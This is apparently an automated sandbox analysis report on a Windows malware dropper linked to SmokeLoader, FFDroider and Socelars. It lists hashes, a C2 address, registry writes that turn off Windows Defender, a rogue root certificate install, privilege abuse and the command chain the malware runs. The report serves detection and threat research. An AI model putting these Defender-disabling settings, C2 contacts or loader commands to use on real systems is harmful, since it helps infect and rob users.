Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
126s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
31/12/2023, 13:10
Static task
static1
General
-
Target
42909ef96fc66ee4ad2b1182f06ecbe6.exe
-
Size
3.8MB
-
MD5
42909ef96fc66ee4ad2b1182f06ecbe6
-
SHA1
9ccde9b068c6dca4172df09853e8b9aa9dcded94
-
SHA256
4cafb22334d394a75bf299e8b582791b939af7d462c79b4423948a34f364481b
-
SHA512
e54ef137f1a12fa1c77090ade5e6fd5c404f84a5c3d0b9227fe95eb72d30e6d03fd0431c265569f7b08dc5f416973081264aa3d634399f30ad273da8f4559f9a
-
SSDEEP
98304:Ub9fEIQBU9HIJ0tyFximjgX7dJw1mLPKZ4ygx2EjufaWte:UpfEIvdIJ0WxHjm5JwSiZ3rEAaH
Malware Config
Extracted
smokeloader
pub2
Extracted
ffdroider
http://128.1.32.84
Signatures
-
FFDroider payload 1 IoCs
resource yara_rule behavioral2/memory/3096-101-0x0000000000400000-0x000000000063B000-memory.dmp family_ffdroider -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" xtect20.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" xtect20.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" xtect20.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" xtect20.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" xtect20.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" xtect20.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection xtect20.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5196 2216 rUNdlL32.eXe 110 -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars payload 1 IoCs
resource yara_rule behavioral2/files/0x0006000000023230-77.dat family_socelars -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation Folder.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation 42909ef96fc66ee4ad2b1182f06ecbe6.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation Fille.exe -
Executes dropped EXE 12 IoCs
pid Process 1236 Fille.exe 368 Folder.exe 516 BearVpn_3.exe 4708 Files.exe 3124 KRSetp.exe 3096 md9_1sjm.exe 1420 Install.exe 5056 pub2.exe 2344 xtect20.exe 4208 Folder.exe 5240 Mantenere.exe.com 5452 Mantenere.exe.com -
Loads dropped DLL 2 IoCs
pid Process 5224 rundll32.exe 5056 pub2.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/memory/3096-101-0x0000000000400000-0x000000000063B000-memory.dmp vmprotect behavioral2/files/0x000600000002322f-88.dat vmprotect behavioral2/files/0x000600000002322f-87.dat vmprotect -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ipinfo.io 16 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process PID 5452 set thread context of 0 5452 Mantenere.exe.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process 5396 5224 WerFault.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Install.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Install.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5268 PING.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 1916 msedge.exe 1916 msedge.exe 3092 msedge.exe 3092 msedge.exe 5056 pub2.exe 5056 pub2.exe 5756 identity_helper.exe 5756 identity_helper.exe 1132 msedge.exe 1132 msedge.exe 1132 msedge.exe 1132 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeDebugPrivilege 516 BearVpn_3.exe Token: SeCreateTokenPrivilege 1420 Install.exe Token: SeAssignPrimaryTokenPrivilege 1420 Install.exe Token: SeLockMemoryPrivilege 1420 Install.exe Token: SeIncreaseQuotaPrivilege 1420 Install.exe Token: SeMachineAccountPrivilege 1420 Install.exe Token: SeTcbPrivilege 1420 Install.exe Token: SeSecurityPrivilege 1420 Install.exe Token: SeTakeOwnershipPrivilege 1420 Install.exe Token: SeLoadDriverPrivilege 1420 Install.exe Token: SeSystemProfilePrivilege 1420 Install.exe Token: SeSystemtimePrivilege 1420 Install.exe Token: SeProfSingleProcessPrivilege 1420 Install.exe Token: SeIncBasePriorityPrivilege 1420 Install.exe Token: SeCreatePagefilePrivilege 1420 Install.exe Token: SeCreatePermanentPrivilege 1420 Install.exe Token: SeBackupPrivilege 1420 Install.exe Token: SeRestorePrivilege 1420 Install.exe Token: SeShutdownPrivilege 1420 Install.exe Token: SeDebugPrivilege 1420 Install.exe Token: SeAuditPrivilege 1420 Install.exe Token: SeSystemEnvironmentPrivilege 1420 Install.exe Token: SeChangeNotifyPrivilege 1420 Install.exe Token: SeRemoteShutdownPrivilege 1420 Install.exe Token: SeUndockPrivilege 1420 Install.exe Token: SeSyncAgentPrivilege 1420 Install.exe Token: SeEnableDelegationPrivilege 1420 Install.exe Token: SeManageVolumePrivilege 1420 Install.exe Token: SeImpersonatePrivilege 1420 Install.exe Token: SeCreateGlobalPrivilege 1420 Install.exe Token: 31 1420 Install.exe Token: 32 1420 Install.exe Token: 33 1420 Install.exe Token: 34 1420 Install.exe Token: 35 1420 Install.exe Token: SeDebugPrivilege 3124 KRSetp.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe 1916 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2344 xtect20.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2296 wrote to memory of 1236 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 92 PID 2296 wrote to memory of 1236 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 92 PID 2296 wrote to memory of 1236 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 92 PID 2296 wrote to memory of 368 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 94 PID 2296 wrote to memory of 368 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 94 PID 2296 wrote to memory of 368 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 94 PID 2296 wrote to memory of 516 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 127 PID 2296 wrote to memory of 516 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 127 PID 2296 wrote to memory of 4708 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 126 PID 2296 wrote to memory of 4708 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 126 PID 2296 wrote to memory of 3124 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 125 PID 2296 wrote to memory of 3124 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 125 PID 2296 wrote to memory of 3096 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 124 PID 2296 wrote to memory of 3096 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 124 PID 2296 wrote to memory of 3096 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 124 PID 2296 wrote to memory of 1420 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 123 PID 2296 wrote to memory of 1420 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 123 PID 2296 wrote to memory of 1420 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 123 PID 2296 wrote to memory of 5056 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 122 PID 2296 wrote to memory of 5056 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 122 PID 2296 wrote to memory of 5056 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 122 PID 2296 wrote to memory of 2344 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 96 PID 2296 wrote to memory of 2344 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 96 PID 2296 wrote to memory of 2344 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 96 PID 1236 wrote to memory of 2256 1236 Fille.exe 97 PID 1236 wrote to memory of 2256 1236 Fille.exe 97 PID 1236 wrote to memory of 2256 1236 Fille.exe 97 PID 368 wrote to memory of 4208 368 Folder.exe 103 PID 368 wrote to memory of 4208 368 Folder.exe 103 PID 368 wrote to memory of 4208 368 Folder.exe 103 PID 2296 wrote to memory of 1916 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 102 PID 2296 wrote to memory of 1916 2296 42909ef96fc66ee4ad2b1182f06ecbe6.exe 102 PID 2256 wrote to memory of 2528 2256 cmd.exe 101 PID 2256 wrote to memory of 2528 2256 cmd.exe 101 PID 2256 wrote to memory of 2528 2256 cmd.exe 101 PID 1916 wrote to memory of 1132 1916 msedge.exe 100 PID 1916 wrote to memory of 1132 1916 msedge.exe 100 PID 2528 wrote to memory of 4476 2528 cmd.exe 99 PID 2528 wrote to memory of 4476 2528 cmd.exe 99 PID 2528 wrote to memory of 4476 2528 cmd.exe 99 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106 PID 1916 wrote to memory of 1536 1916 msedge.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\42909ef96fc66ee4ad2b1182f06ecbe6.exe"C:\Users\Admin\AppData\Local\Temp\42909ef96fc66ee4ad2b1182f06ecbe6.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Users\Admin\AppData\Local\Temp\Fille.exe"C:\Users\Admin\AppData\Local\Temp\Fille.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Crescente.ini3⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\SysWOW64\cmd.execmd4⤵
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mantenere.exe.comMantenere.exe.com k5⤵
- Executes dropped EXE
PID:5240 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mantenere.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mantenere.exe.com k6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5452
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 305⤵
- Runs ping.exe
PID:5268
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a3⤵
- Executes dropped EXE
PID:4208
-
-
-
C:\Users\Admin\AppData\Local\Temp\xtect20.exe"C:\Users\Admin\AppData\Local\Temp\xtect20.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rPS672⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:83⤵PID:1256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:3092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:23⤵PID:1536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:13⤵PID:2132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:13⤵PID:5064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:5756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:83⤵PID:5740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:13⤵PID:5880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:13⤵PID:5872
-
-
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:5056
-
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
-
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3096
-
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3124
-
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
PID:4708
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn_3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn_3.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:516
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^lmesxrORijUjeOjnoLtleIpFEzCCKScCJihKoesqpDBLYVUYVpGiCQFBdvNwBjigQsDUABfuxtqninHJmDGAjhqSBLxMfdnXvjUGsqbxTANbPixRPrCXGGeDdLaPiD$" Piramide.ini1⤵PID:4476
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9347a46f8,0x7ff9347a4708,0x7ff9347a47181⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1132
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2928
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5144
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5224 -ip 52241⤵PID:5364
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 6041⤵
- Program crash
PID:5396
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Loads dropped DLL
PID:5224
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:5196
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵PID:4040
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
736KB
MD58c18e329e806ec6dd6329b63a51e3b19
SHA1b085fe36bb65780fb0f8fdcc1fd62db3b10163e4
SHA25667accf28cf796fdc2c23795c42d9b24fc2a662c21f889afbf77df54b8d466213
SHA5128a86de54bc3d98abb0082221acca50e11f692ca7e24b497ecab3ea44a9aa9689cc6e7759e940b25d7120acc86ac7d901c190bceae2c7f58dc9a2b68570a1eba7
-
Filesize
63KB
MD50d5df43af2916f47d00c1573797c1a13
SHA1230ab5559e806574d26b4c20847c368ed55483b0
SHA256c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc
SHA512f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2
-
Filesize
8KB
MD560fda22bdeacf110bd17e573d4755179
SHA19ec652c1adfdd612ff94d5405b37d6ce2cdeee58
SHA25675c08d47e30fb238396887e7dfe14468e8f55563fd157ff27620e91e37a9a9a0
SHA51229b5a77bbf9ab7dfd6914fdb7ca516c329aa6dcd23958276f2373566ce94b294add0ecd241f83ff77456a558b2089d7d2cee0867b1b5de7630f62b3b73848afb
-
Filesize
239KB
MD59d8cf8de9b97800927728c11c3ea1a05
SHA10f22a1883ee171c6dd3ca2a7989e3585852fb3e7
SHA256684be08639023e02b2940bea89373e8657bf7b4fb826d22455058ae40f3b57f3
SHA512021834c482a20e7d998ffd8af980f0b73a16c13967966d9ec211d269ec2df990d8f5313b9567e5daaa590dfa91abe2ec57a7a9693197e110b75f035b6f404887
-
Filesize
106KB
MD5f362b753e4ec9e8a7525ee9bb7fb4245
SHA12bc66ccc205c5304083733c30202d25d8f14591a
SHA2565f5cf15838c36569f5cb3a323e5af3099f76f42d46f2799bed5a31ed8d34c0c6
SHA5128139d41b3795690d44e1536eb7b7b31e4ce59f43ab8c5f786089256c2c9556630701b21dd41e3f6b8f227ee53f5e145899b34ea5f8dac8749840cb9a7a93aae8
-
Filesize
1.1MB
MD5e35987fd2d4cd3ff879d467319e43709
SHA1f55a7b78b464043abfb153e7f6d2d0688b78b261
SHA2564ca6fef9e1702bbe7f84460fb9bb7cbd2085553b7fa489936e145291846175c8
